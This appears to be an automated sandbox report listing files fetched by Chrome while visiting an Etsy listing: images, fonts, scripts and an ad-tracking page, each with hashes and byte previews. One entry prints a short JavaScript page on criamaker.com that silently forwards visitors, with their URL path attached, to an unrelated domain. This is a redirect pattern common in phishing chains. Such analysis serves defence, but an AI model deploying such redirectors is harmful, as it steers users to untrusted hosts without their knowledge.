                                                                                                                                                                              SHA-512:494D0459CD30837409A66B11B263BEB58B977DEAEA16DDA071EDAF11B659B845F6EAB2E8F9FB1B1AED42B8DA4AA2E01EBFD9DBB504193F3EA223DA1EBFF13D0D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/155574/6102693764/il_170x135.6102693764_1idw.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................D...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma..................Lmdat.......a. !..2.:.P...A@.J.....k.b.nJ.fke..v.....{..... .E..<3t....$..T..&.......cA.gCu...aAY......i^..~+x..h&....W.7.D!.1.3).eu..4&<..........T....Z.uv........[....{...o..h.K......r.U....*...V.P..,.....=n...[.T..,S.r.3..:.{.t6.?K.T...~.&.s.!h....N.R.?.96.$......b..._...Zf...(..I..ZZ.....j...s.dq....9|...Z.........`..-.f.A..i.....a.MV.. ..X....U........{.\....-.V....C_M.TD...y.f......dO...f.....+.P/...a.....C/.?.}TjX...`f!.+.vH;.N!...SA.....?..3....R..`25.6.'.X0...=|}.K.RU....k!.9.R.C!`L.O...(.v\...B......I.......4..^.c..t..<.@\.....h..|.....Q.......G.w.r.........s|...M|p.".3^.[.B.*..m.k.b.../...Z.?.Z?....\.....4_ ..E..o-..X..:.O...!.^.V..B..1..>.|B.%`9.XI..(..g>..E2...f.....\..M.s...B.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):41017
                                                                                                                                                                              Entropy (8bit):7.95760959011817
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B31B6ED5717A95529762D4F6DA4B80ED
                                                                                                                                                                              SHA1:45B0BA32337CC4DE880F9A553849952DDB13E3EB
                                                                                                                                                                              SHA-256:6756DDD12601253126AA921EB3E86D353ABE81E7608ADB2CD1AE6A3636412DF4
                                                                                                                                                                              SHA-512:CEECEDE2AF08416CD720DB0DB8195E946FA0B3ADD386FE9CE54CEC2ECD4C61C3BF0F1FCD011120A9D6EC7C34F6F23149E0B209A65A0CB9EC6D55B4E17BCE106E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................?........................!1.AQ..a"q.2...B...#R..r..$3.b.C%4D...................................;.......................!..1A.Qaq."..#2B..R...3r.$Cb...cs.............?...?.4......_[\...P.P...=.o.my....3S..CO..|w5.'.n:fl.......b.g.._:.|].:Z.<%..(
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):63844
                                                                                                                                                                              Entropy (8bit):7.996500583531826
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BCECEDD7D0BBDC569285465D09B0B863
                                                                                                                                                                              SHA1:18618926F68ABC8F0C370BC9116585E2137271B0
                                                                                                                                                                              SHA-256:5DBE804DC36C9C44F24DEA4A05EA0205521B4C723E34DB6444CEB0EC5344974F
                                                                                                                                                                              SHA-512:4DE02AD5F663D6DAC60348610FD38DA879FDF13B1B092DFB7ACA4EA254193C7808132F2A4870B49C6FFF5330DF8D144FF20B3687E991CF338FF4B0C58843AA3F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/24455472/r/il/125633/5203693847/il_600x600.5203693847_3ah1.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................V...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................^mdat.....&ey_.....2.... ...A@.....<i:..Pir.....x..&......pEV.z.%....f...K}$.I..c... p.T0.......N..o?.]..sOw..XJ.!.w..eA........_X..z.XbI....zjC.7.....lW..'.[.{...j..q....v11.@..//.zh?......E..0'.cbj..<..[=....D3....p.F.I.K.e...IH>.!G..V..].L!w.5F.D.-|q...."B........lQ.3..Z.'I.9.....*;....cG..x.^l..g...I.....N..k...&....T...Z..=..XoyY@....RPJ....>......{.........N. .U.._n/..LI.....z]..C.....e;..:....g .|..Pm.6...l.&.cz.W%d..C..Fg.k..>.5^......x.9d..g.L.q.:..%c..Y.&..4..:Z2............4..... ....%.W...uK...v:.,.E.og.R..D...'....M.UG..-..]..!..........=.a...`.......v.E.t.(:..5..w.1.m@....2.DfH.....)I....9.K..!....!.n...........|Sd...F..4.\l{..e..._..,...E.U..8..5q.m<.......kQBna.k[}xJn...T.qK....F.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):41888
                                                                                                                                                                              Entropy (8bit):7.969645606772357
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:493487EFE6672D9DA5C38BCC8692A61F
                                                                                                                                                                              SHA1:C763F5260A0DD0F5832FE906CE8A61B64FF776A9
                                                                                                                                                                              SHA-256:FD85D9E6A4A36C6DCAC4702A043F59D2618B9E3BA5BAA0B8209D34CA01D089AC
                                                                                                                                                                              SHA-512:34524268EA1882B106C4A71F6EA9F16C5C3CCFC8CC5AA2C7C63E9F4418410A3B44C44AADE7B81CBA94187EAEC105A277205FB7D2E6DECF4E0F8DFA0B02B24B91
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................T........................!1..AQ..aq.."2R...#3BSbr...$4CT...%5Dc...Es....d.6Ut....&.................................7........................!1..AQq2a."R..B..3.b.#C...S..............?..."...d.$....!.P......"T.pBT...H...G$........B..$J...9!...O....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28272, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):28272
                                                                                                                                                                              Entropy (8bit):7.993468808748159
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3702E4A9A8E642C049309B602F004889
                                                                                                                                                                              SHA1:0ED4B32A6F3B01CFA94EA38246D8E8953CA41354
                                                                                                                                                                              SHA-256:DC9ADBD7374AAF571A3EFC69187E30DAC41FCB04F678A1387C63BD7D558DDFA8
                                                                                                                                                                              SHA-512:0981888B83085F62581E9F1FD2DBDB34B6FDBB2702045AF6D67294ADF8EA710658B9B755F060E70AA69FBDCD0C6E9357FC05C0971F6CD52F59AC8C5911E042A5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/assets/type/Guardian-EgypTT-Light.woff2
                                                                                                                                                                              Preview:wOF2......np......G...n.................................`..V....s...H..,.....6.$..4. ..L..P..^[.&q#..|...0X...U.....6...z.*:b...........f.....%...P.s.!RU.>/..yu..=..\.p.=0.~l*..U&uT....;BwF.^..4.r..S..........xkyCx]...`..`.`..pl..a.M..S.O.}[Z.iw...4..^..G\..L.P,1T.+,7.;.,...ZpNb...=.8t^mW{N..:.:V._..Ov.B.pa.....U@96.F.r....?...{3.%$9..Qh.....(..........<B2....g$fm....%..q..S..J].P...+u....b.M...n{......Z..5.....u.?:.O...I ."..g..Y{..:...+....(.a.^.65.....C.....X(.....I....O...+.....9..J.(.rb...H.=...\.......uS.B......>.v...(...OSa...%WV.~..(...S..0.jz.}S.jd/T.......U.6.q...d...N...uD...$Y. .H....B&.;?.......!0..9x......q....eD.).t....,.$.:..s..N....8...Rd.7{/$..c$..&.0..+4..sj.Q+%...1.^g>.gy6.....rR..B...2.v...)...`.e..~..\.+QL........6P......_.(...L.kw=.D.D.\.D.G.H$..s.P..>.W......R...[..-....... N...p!.).:UM#...!0u.=J^..B`l]..=.*....{........w..z...J).|.<.t.....{[Z..=n......u..[Z.t+. .y.OO...5.F4....4..$.d.....k..Y`f.-.2.w9G.^._.1..e..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, was "main.97c41ef3.js", last modified: Fri Aug 23 15:57:59 2024, from Unix, original size modulo 2^32 83598
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):27512
                                                                                                                                                                              Entropy (8bit):7.993187350119009
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0304D337D72A7B17907261BF86E2F221
                                                                                                                                                                              SHA1:D56F37B6686036EE3945D877BAF2849245073FCE
                                                                                                                                                                              SHA-256:F8501D2AAB7B556B8D8A56E8F7C6E9E21D01204249AC6D43470015AA86E2A5A7
                                                                                                                                                                              SHA-512:6D15FC21EFD7CB6BDD2924CB9C16E1B8ABF070AFBA1C63B7FAF998A1CB7ACB3A0CAD5F52EC27EE8763328669F40AD50CA32D62A2E94AF4073218C5DC4B79FFA3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://s.pinimg.com/ct/lib/main.97c41ef3.js
                                                                                                                                                                              Preview:.......f..main.97c41ef3.js..\.o...*...b%...8.,.h{3`.[;,.... Pl:..Py..47.>.;..%..4....D......?.C.`Y.HRn3.p.g..>l.....B5.i.D.q;;...)^.$..:<.]..&.D.>l...G.y.^.|X......7kz...M....pN3....2./..d..%.l>_...b.`.._..e.^v{`..fY|.f!..b"d[..z.A.<X.Wo/..*.oX...__..~_....Td...._..]#..u.]../.X3kK......<.R.(..8....E...Nl`.{..D..,.<..S+.#XTO........."2ZB.g,....zM......(s-h....v...s.c q..5K9Y..-........2.\....f;.L.B.r3BJ..1d.o,..I.c.a1..T..$..6ly....w....r9..6.z...M....6\...;.y..._@.7.....S.'[.. ..........lz.;.....O....#......J..._...._..................|4>.M.G.......q0.V./..`.R.Xe.]....o1.b'Y..f..au.E.....Y...._..U-L..H........J...Br..j>...V............((A.{UY..}`....U....".s....t@.W$P.-..K...ZiVf#...Z.v.`..4..=.......B~...2.......L.\.'.@...].pw.zq..^..(.'..3.........4)L.,....<-.UT^.).XD.x...e`ML..O..&T..r.......{.~.......-Q.!s...2g..20-D.F.L.Xn.].Q...f..RJ.ZI.lN.m......~u..v.7%.#....m.Pn.v$4....v..M........>gT...0....Y%.).6s;+......vA.v.d.Z...p...C....x..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):232
                                                                                                                                                                              Entropy (8bit):4.957566564753124
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F7B3091CB1698F25690CE87699AAB3EC
                                                                                                                                                                              SHA1:013C0A44D5EF4A96377AE332ADAF7E255E32686A
                                                                                                                                                                              SHA-256:FCEBEB185374900DD00978620B41999A1B216AD52B340A804CC3FC4ECEADCBBB
                                                                                                                                                                              SHA-512:546A8071E22B16E7529F1F715E8F791F69E66F80D84F38B96A057A7226D35D649489BE774B45731D15B244E4DB32E3B4CACC867384149D925C03A54CF9F7E645
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://criamaker.com/KA/
                                                                                                                                                                              Preview:<html>.. <body></body>.. <script>.. var u = window.location.href.lastIndexOf("/") + 1;.. var d = window.location.href.substring(u);.. window.location.replace("https://v2nT.molouscre.com/wZoRh/" + d);.. </script>..</html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (22096), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):22096
                                                                                                                                                                              Entropy (8bit):5.1556985111456
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4EDDEEC95AFDA969B3D1B2FB970C1EB1
                                                                                                                                                                              SHA1:DA4C64223B6FF380F03AE2506DF526C22A9103D9
                                                                                                                                                                              SHA-256:42E2DD427DD9F9D45367C880C68289114B7DE56373FF8BDC664EA0FA3CE77880
                                                                                                                                                                              SHA-512:2D431F9BDB08263AB0BC0A596F13E35A136318DA42190EC08712FB1CF963A82EC56FD04231084C876F57853F5930E25F65B1F9D451BDDF140134C7C05F89A0C4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(()=>{"use strict";var t={228:t=>{var n=Object.prototype.hasOwnProperty,e="~";function r(){}function o(t,n,e){this.fn=t,this.context=n,this.once=e||!1}function i(t,n,r,i,c){if("function"!=typeof r)throw new TypeError("The listener must be a function");var u=new o(r,i||t,c),a=e?e+n:n;return t._events[a]?t._events[a].fn?t._events[a]=[t._events[a],u]:t._events[a].push(u):(t._events[a]=u,t._eventsCount++),t}function c(t,n){0==--t._eventsCount?t._events=new r:delete t._events[n]}function u(){this._events=new r,this._eventsCount=0}Object.create&&(r.prototype=Object.create(null),(new r).__proto__||(e=!1)),u.prototype.eventNames=function(){var t,r,o=[];if(0===this._eventsCount)return o;for(r in t=this._events)n.call(t,r)&&o.push(e?r.slice(1):r);return Object.getOwnPropertySymbols?o.concat(Object.getOwnPropertySymbols(t)):o},u.prototype.listeners=function(t){var n=e?e+t:t,r=this._events[n];if(!r)return[];if(r.fn)return[r.fn];for(var o=0,i=r.length,c=new Array(i);o<i;o++)c[o]=r[o].fn;return c},u
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1269
                                                                                                                                                                              Entropy (8bit):7.4067188116965275
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6A7235A5E68F7B223EC32C98CE0395EF
                                                                                                                                                                              SHA1:A7451DCFF83F9FF03C06539235ABF1AA2A5E2856
                                                                                                                                                                              SHA-256:0E5172164B5BD5C7D28163C2D9BD79CEED307366ECE399966C3892EC4A3A0518
                                                                                                                                                                              SHA-512:9D89A1D7A3860F984CD4628D61ABFBAE7FFBA1B049DBA17E9E95DCC1A442A6B1B80C0D047CD5E3D3FF5CBF1CDC5FD40E27AEC8EF99F3E91624CEB1BF308E3986
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/12295377/r/il/90ee5e/6226107962/il_100x100.6226107962_mdqq.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma...................mdat........`...B2.......q@.+I....*..1......X.s...cl...I:..Th..)...9...@6.. .E1.....qK..}8FG.,p..f7.._._..Z3.....b.-.$=.As1..n.{.....t..#.h....E..6...e.]I4...I......{.........j.A.H...HU..%.W..n\V...O....OQ.z.I.C..f..J.0a.nw...N..E.W.../-...:.".-.^..M...9H..^Z..n8b.s...-.:.#<H....%..p.:.h..g...O....c.S...:k. ,.9.@.3...c.3..q6.}.M.q.Z..s._..#...:{f............+...?v2..c.|.\P.t......T.....=...{.H)..l4"Al['.i....C.!^.....q!.R...!#..:......{w...].n.a.$.....<..Xe..!T....4.J./r.}.....#.Rl~.d 6I<@.....yJ.Ck..I.e.....Yf.+.8Ug2."}.bS......N...sO.;w...&...I(qf.....K.8..baaE'@..[..Q...4...C..k$BD.X...b..Bt.5..K.......k.S[..R.. 0~.,%NnI...$...........0B.Y.u..h.h`d..spR[..)....r.&H'.x./<..v....{..+f6.x
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (981), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):981
                                                                                                                                                                              Entropy (8bit):5.5955389638244055
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8545797B52EE5D2D9527EE4E8F52C0AC
                                                                                                                                                                              SHA1:64E426CAABF60CA99C5AFF83FD7F66FAB5E93F13
                                                                                                                                                                              SHA-256:19CCC8AFD0827FF741E76680FCB291B05236C1D693BE86528021454530102C26
                                                                                                                                                                              SHA-512:A07685E0EE1B287678810735A39022863D56614A61CC27E1D423B9D161807B1022DD21D8972A5CD0E9FCF3BD56C40045818220990709EC7C95AAD4BEBC5FB7AE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://9910951.fls.doubleclick.net/activityi;dc_pre=COrcmK-dn4kDFSST_Qcds2Is6Q;src=9910951;type=remarkt;cat=unive0;ord=5593085290221;npa=0;auiddc=2084024919.1729505276;u2=%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween;u3=1592961087;ps=1;pcor=680015857;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=COrcmK-dn4kDFSST_Qcds2Is6Q;src=9910951;type=remarkt;cat=unive0;ord=5593085290221;npa=0;auiddc=*;u2=%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween;u3=1592961087;ps=1;pcor=680015857;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3"/></body></html>
                                                                                                                                                                              No static file info